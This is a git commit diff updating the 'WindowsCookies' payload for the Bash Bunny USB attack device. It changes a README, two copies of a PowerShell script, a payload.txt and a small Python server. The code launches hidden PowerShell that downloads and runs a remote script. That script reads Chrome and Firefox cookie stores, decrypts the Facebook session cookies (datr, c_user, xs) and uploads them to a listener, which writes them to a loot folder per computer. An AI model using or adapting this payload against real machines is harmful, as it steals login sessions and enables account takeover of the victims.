Updated WindowsCookie for firmware v1.1 and fix powershell regex for Windows 7 (#161)

pull/153/merge
Ben 2017-04-10 03:11:33 +01:00 committed by Sebastian Kinne
parent ce0c7d2dbd
commit 32468087e1
5 changed files with 266 additions and 260 deletions

6
payloads/library/WindowsCookies/README.md Normal file → Executable file
View File

@ -1,13 +1,13 @@
# WindowsCookies for Bash Bunnys
Author: oXis
Version: Version 2.0
Version: Version 2.1
Credit: illwill, sekirkity, EmpireProject
## Description
Based on BrowserCreds from illwill, this version grabs Facebook session cookies from Chrome/Firefox on Windows, decrypt them and put them in /root/udisk/loot/FacebookSession
Only works for Chrome/Firefox on Windows. Tested on two different Windows 10 machines.
Only works for Chrome/Firefox on Windows. Tested on two different Windows 10 machines, now works on Windows 7 (fixed powershell regex)
Only payload.txt, server.py and p are required.
Server.py will load a local HTTP server, the script is downloaded from that server and then uploads the cookies to it.
@ -16,6 +16,6 @@ Server.py will load a local HTTP server, the script is downloaded from that serv
| LED | Status |
| ---------------- | -------------------------------------- |
| Blue (blinking) | Payload init |
| White (blinking) | Setup RNDIS_ETHERNET |
| Yellow (blinking)| Setup RNDIS_ETHERNET |
| Green (blinking) | Done |

242
payloads/library/WindowsCookies/get_facebook_cookies.ps1 Normal file → Executable file
View File

@ -1,118 +1,124 @@
# Instructions: import the module, then perform the commanded needed.
# Chrome Facebook cookies extraction
# Use: Get-FacebookCreds [path to Login Data]
# Path is optional, use if automatic search doesn't work
function Get-FacebookCreds-Firefox() {
Param(
[String]$Path
)
if ([String]::IsNullOrEmpty($Path)) {
# $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
$path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
}
if (![system.io.file]::Exists($Path))
{
Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
Break
}
Add-Type -AssemblyName System.Security
# Credit to Matt Graber for his technique on using regular expressions to search for binary data
$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
$Encoding = [system.Text.Encoding]::GetEncoding(28591)
$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
$BinaryText = $StreamReader.ReadToEnd()
$StreamReader.Close()
$Stream.Close()
# First the magic bytes for the facebook string, datr size is 24
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
$datr = $PwdMatches.groups[1]
# First the magic bytes for the facebook string, c_user size is 15
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
$c_user = $PwdMatches.groups[1]
# First the magic bytes for the facebook string, xs size is 44
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
$xs = $PwdMatches.groups[1]
"$env:computername ---> "
"datr is $datr ###"
"c_user is $c_user ###"
"xs is $xs ###"
}
function Get-FacebookCreds-Chrome() {
Param(
[String]$Path
)
if ([String]::IsNullOrEmpty($Path)) {
$Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
}
if (![system.io.file]::Exists($Path))
{
Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
Break
}
Add-Type -AssemblyName System.Security
# Credit to Matt Graber for his technique on using regular expressions to search for binary data
$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
$Encoding = [system.Text.Encoding]::GetEncoding(28591)
$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
$BinaryText = $StreamReader.ReadToEnd()
$StreamReader.Close()
$Stream.Close()
# First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
$datr = [System.Text.Encoding]::Default.GetString($Decrypt)
# First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
$c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
# First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
$xs = [System.Text.Encoding]::Default.GetString($Decrypt)
"$env:computername ---> "
"datr is $datr ###"
"c_user is $c_user ###"
"xs is $xs ###"
}
function Payload() {
Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Chrome))
Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Firefox))
}
# Instructions: import the module, then perform the commanded needed.
# Chrome Facebook cookies extraction
# Use: Get-FacebookCreds [path to Login Data]
# Path is optional, use if automatic search doesn't work
function Get-FacebookCreds-Firefox() {
Param(
[String]$Path
)
if ([String]::IsNullOrEmpty($Path)) {
# $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
$path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
}
if (![system.io.file]::Exists($Path))
{
Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
Break
}
Add-Type -AssemblyName System.Security
# Credit to Matt Graber for his technique on using regular expressions to search for binary data
$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
$Encoding = [system.Text.Encoding]::GetEncoding(28591)
$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
$BinaryText = $StreamReader.ReadToEnd()
$StreamReader.Close()
$Stream.Close()
# First the magic bytes for the facebook string, datr size is 24
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
$datr = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
# $datr = $PwdMatches.groups[1]
# First the magic bytes for the facebook string, c_user size is 15
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
$c_user = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
# $c_user = $PwdMatches.groups[1]
# First the magic bytes for the facebook string, xs size is 44
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
$xs = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
# $xs = $PwdMatches.groups[1]
"Firefox ---> "
"datr is $datr ###"
"c_user is $c_user ###"
"xs is $xs ###"
}
function Get-FacebookCreds-Chrome() {
Param(
[String]$Path
)
if ([String]::IsNullOrEmpty($Path)) {
$Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
}
if (![system.io.file]::Exists($Path))
{
Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
Break
}
Add-Type -AssemblyName System.Security
# Credit to Matt Graber for his technique on using regular expressions to search for binary data
$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
$Encoding = [system.Text.Encoding]::GetEncoding(28591)
$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
$BinaryText = $StreamReader.ReadToEnd()
$StreamReader.Close()
$Stream.Close()
# First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
$datr = [System.Text.Encoding]::Default.GetString($Decrypt)
# First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
$c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
# First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
$xs = [System.Text.Encoding]::Default.GetString($Decrypt)
"Chrome ---> "
"datr is $datr ###"
"c_user is $c_user ###"
"xs is $xs ###"
}
function Payload() {
Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Chrome))
Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Firefox))
}

242
payloads/library/WindowsCookies/p Normal file → Executable file
View File

@ -1,118 +1,124 @@
# Instructions: import the module, then perform the commanded needed.
# Chrome Facebook cookies extraction
# Use: Get-FacebookCreds [path to Login Data]
# Path is optional, use if automatic search doesn't work
function Get-FacebookCreds-Firefox() {
Param(
[String]$Path
)
if ([String]::IsNullOrEmpty($Path)) {
# $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
$path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
}
if (![system.io.file]::Exists($Path))
{
Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
Break
}
Add-Type -AssemblyName System.Security
# Credit to Matt Graber for his technique on using regular expressions to search for binary data
$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
$Encoding = [system.Text.Encoding]::GetEncoding(28591)
$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
$BinaryText = $StreamReader.ReadToEnd()
$StreamReader.Close()
$Stream.Close()
# First the magic bytes for the facebook string, datr size is 24
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
$datr = $PwdMatches.groups[1]
# First the magic bytes for the facebook string, c_user size is 15
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
$c_user = $PwdMatches.groups[1]
# First the magic bytes for the facebook string, xs size is 44
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
$xs = $PwdMatches.groups[1]
"$env:computername ---> "
"datr is $datr ###"
"c_user is $c_user ###"
"xs is $xs ###"
}
function Get-FacebookCreds-Chrome() {
Param(
[String]$Path
)
if ([String]::IsNullOrEmpty($Path)) {
$Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
}
if (![system.io.file]::Exists($Path))
{
Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
Break
}
Add-Type -AssemblyName System.Security
# Credit to Matt Graber for his technique on using regular expressions to search for binary data
$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
$Encoding = [system.Text.Encoding]::GetEncoding(28591)
$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
$BinaryText = $StreamReader.ReadToEnd()
$StreamReader.Close()
$Stream.Close()
# First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
$datr = [System.Text.Encoding]::Default.GetString($Decrypt)
# First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
$c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
# First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
$xs = [System.Text.Encoding]::Default.GetString($Decrypt)
"$env:computername ---> "
"datr is $datr ###"
"c_user is $c_user ###"
"xs is $xs ###"
}
function Payload() {
Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Chrome))
Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Firefox))
}
# Instructions: import the module, then perform the commanded needed.
# Chrome Facebook cookies extraction
# Use: Get-FacebookCreds [path to Login Data]
# Path is optional, use if automatic search doesn't work
function Get-FacebookCreds-Firefox() {
Param(
[String]$Path
)
if ([String]::IsNullOrEmpty($Path)) {
# $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
$path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
}
if (![system.io.file]::Exists($Path))
{
Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
Break
}
Add-Type -AssemblyName System.Security
# Credit to Matt Graber for his technique on using regular expressions to search for binary data
$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
$Encoding = [system.Text.Encoding]::GetEncoding(28591)
$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
$BinaryText = $StreamReader.ReadToEnd()
$StreamReader.Close()
$Stream.Close()
# First the magic bytes for the facebook string, datr size is 24
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
$datr = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
# $datr = $PwdMatches.groups[1]
# First the magic bytes for the facebook string, c_user size is 15
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
$c_user = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
# $c_user = $PwdMatches.groups[1]
# First the magic bytes for the facebook string, xs size is 44
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
$xs = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
# $xs = $PwdMatches.groups[1]
"Firefox ---> "
"datr is $datr ###"
"c_user is $c_user ###"
"xs is $xs ###"
}
function Get-FacebookCreds-Chrome() {
Param(
[String]$Path
)
if ([String]::IsNullOrEmpty($Path)) {
$Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
}
if (![system.io.file]::Exists($Path))
{
Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
Break
}
Add-Type -AssemblyName System.Security
# Credit to Matt Graber for his technique on using regular expressions to search for binary data
$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
$Encoding = [system.Text.Encoding]::GetEncoding(28591)
$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
$BinaryText = $StreamReader.ReadToEnd()
$StreamReader.Close()
$Stream.Close()
# First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
$datr = [System.Text.Encoding]::Default.GetString($Decrypt)
# First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
$c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
# First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
$xs = [System.Text.Encoding]::Default.GetString($Decrypt)
"Chrome ---> "
"datr is $datr ###"
"c_user is $c_user ###"
"xs is $xs ###"
}
function Payload() {
Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Chrome))
Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Firefox))
}

21
payloads/library/WindowsCookies/payload.txt Normal file → Executable file
View File

@ -2,34 +2,31 @@
#
# Title: Facebook session cookies dump
# Author: oXis (inspired by illwill)
# Version: 2.0
# Version: 2.1
#
# Dumps the stored session cookies from Chrome browser by downloading a Powershell script
# then stashes them in /root/udisk/loot/FacebookSession/l
# Credits to these guys for their powershell scripts:
# https://github.com/sekirkity/BrowserGather BrowserGather.ps1
# https://github.com/EmpireProject/Empire Get-FoxDump.ps1
# Also credit to illwill for the BrowerCreds payload
# Dumps the stored session cookies from Chrome/Firefox browser by downloading a Powershell script
# then stashes them in /root/udisk/loot/FacebookSession/COMPUTER_NAME
# Credit to illwill for the BrowerCreds payload
#
# LED States
# Setup.............Setup
# Blue..............Running Script
# White.............Setup RNDIS_ETHERNET
# Yellow............Setup RNDIS_ETHERNET
# Green.............Got Browser Creds
LED SETUP
LOOTDIR=/root/udisk/loot/FacebookSession
mkdir -p $LOOTDIR
ATTACKMODE HID
LED STAGE1
GET SWITCH_POSITION
cd /root/udisk/payloads/$SWITCH_POSITION/
# server.py can now instant bind sockets
iptables -A OUTPUT -p udp --dport 53 -j DROP
./server.py &
sleep 1
#Dump Chrome Cookies
RUN WIN "powershell -WindowStyle Hidden \"while(\$true){If(Test-Connection 172.16.64.1 -count 1 -quiet){sleep 2;IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1:8080/p'); Payload; exit}}\""
RUN WIN "powershell -WindowStyle Hidden while(\$true){If(Test-Connection 172.16.64.1 -count 1 -quiet){sleep 2;IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1:8080/p'); Payload; exit}}"
LED STAGE2
ATTACKMODE RNDIS_ETHERNET

15
payloads/library/WindowsCookies/server.py Normal file → Executable file
View File

@ -3,10 +3,9 @@ from os import curdir
from os.path import join as pjoin
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
# from http.server import BaseHTTPRequestHandler, HTTPServer
class StoreHandler(BaseHTTPRequestHandler):
store_path = pjoin("/root/udisk/loot/FacebookSession/", 'l')
store_path = "/root/udisk/loot/FacebookSession"
get_path = pjoin(curdir, 'p')
def do_GET(self):
@ -18,16 +17,14 @@ class StoreHandler(BaseHTTPRequestHandler):
self.wfile.write(fh.read().encode())
def do_POST(self):
if self.path == '/l':
length = self.headers['content-length']
data = self.rfile.read(int(length))
length = self.headers['content-length']
data = self.rfile.read(int(length))
with open(self.store_path, 'a') as fh:
fh.write(data.decode() + "\n")
with open(self.store_path + self.path, 'a') as fh:
fh.write(data.decode() + "\n")
self.send_response(200)
self.send_response(200)
server = HTTPServer(('', 8080), StoreHandler)
server.serve_forever()